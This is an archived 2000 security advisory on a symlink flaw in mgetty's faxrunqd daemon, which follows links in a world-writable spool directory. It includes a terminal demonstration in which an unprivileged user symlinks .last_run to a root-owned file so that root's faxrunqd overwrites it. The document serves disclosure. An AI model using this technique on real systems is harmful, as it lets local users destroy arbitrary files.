[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : mgetty local compromise

Title: mgetty local compromise
Released by: Stan Bubrouski
Date: 26th August 2000
Printable version: Click here
Author                 : Stan Bubrouski

Date                    : August 26, 2000

Package              : mgetty

Versions affected : 1.1.22, 1.1.21 and prior (at least back to 1994)

Severity               : faxrunqd follows symbolic links when creating

certain files. The default location

                             for the files is /var/spool/fax/outgoing,

which is a world-writable directory. Local

                             users can destroy the contents of any file on

a mounted filesystem because faxrunqd is

                             usually run by root.

Problem              : mgetty comes with a program named faxrunqd, which is

a daemon to send fax jobs queued

                             by faxspool(1).  Upon successful execution, a

file named .last_run is created in the

                             /var/spool/fax/outgoing/ directory which is

world-writable.  The problem lies in the

                             fact faxrunqd will follow symlinks created by

any user, allowing file creation anywhere

                             and allowing existing files to be

overwritten/destroyed.

Example:



Remote unprivilaged user:

[user@king /tmp]$ id

uid=200(user) gid=100(users) groups=100(users)

[user@king /tmp]$ ls -al /var/spool/fax/outgoing

total 3

drwxrwxrwt    3 root     root         1024 Jun  2 18:46 .

drwxr-xr-x    4 root     root         1024 Jun  2 18:46 ..

drwxrwxrwx    2 root     root         1024 Jun  1 00:47 locks

[user@king /tmp]$ ls -al /etc/smash_me

-rw-r--r--    1 root     root           12 Jun  2 18:45 /etc/smash_me

[user@king /tmp]$ cat /etc/smash_me

Smash me!!!

[user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run

[user@king /tmp]$ ls -al /var/spool/fax/outgoing

total 3

drwxrwxrwt    3 root     root         1024 Jun  2 18:48 .

drwxr-xr-x    4 root     root         1024 Jun  2 18:46 ..

lrwxrwxrwx    1 user     users          13 Jun  2 18:48 .last_run ->

/etc/smash_me

drwxrwxrwx    2 root     root         1024 Jun  1 00:47 locks



Root console:

[root@king /tmp]# faxrunqd -l ttyS0

...



Remote unprivilaged user:

[user@king /tmp]$ ls -al /var/spool/fax/outgoing

total 3

drwxrwxrwt    3 root     root         1024 Jun  2 18:48 .

drwxr-xr-x    4 root     root         1024 Jun  2 18:48 ..

lrwxrwxrwx    1 user     users          13 Jun  2 18:48 .last_run ->

/etc/smash_me

drwxrwxrwx    2 root     root         1024 Jun  1 00:47 locks

[user@king /tmp]$ ls -al /etc/smash_me

-rw-r--r--    1 root     root           44 Jun  2 18:48 /etc/smash_me

[user@king /tmp]$ cat /etc/smash_me

Fri Jun  2 18:48:47 2000 /usr/sbin/faxrunqd

[user@king /tmp]$



Believed to be vulnerable:



Red Hat Linux 6.2 and all prior versions                 (Vulnerable)

Linux-Mandrake 7.1 and all prior versions              (Vulnerable)

Conectiva Linux 4.2, 5.0, and 5.1                          (Untested)

LinuxPPC 1999 and 2000                                     (Untested)

TurboLinux 4.0, 6.0                                              (Untested)

Debian 2.2 (potato), 2.1 (slink)                              (Untested)

Yellow Dog Linux Champion Server 1.0, 1.1, 1.2     (Untested)

MkLinux Pre Release 1 (R1)                                 (Untested)

Caldera OpenLinux 2.2, 2.3, 2.4                            (Untested)

Think Blue Linux 1.0 (Linux for the S/390)              (Untested)

OpenBSD 2.7? (mgetty is included in ports packages)

NetBSD 1.4.2?

FreeBSD?

Probably others...



Believed to be unaffected:

SuSE - all versions

Slackware - all versions








(C) 1999-2000 All rights reserved.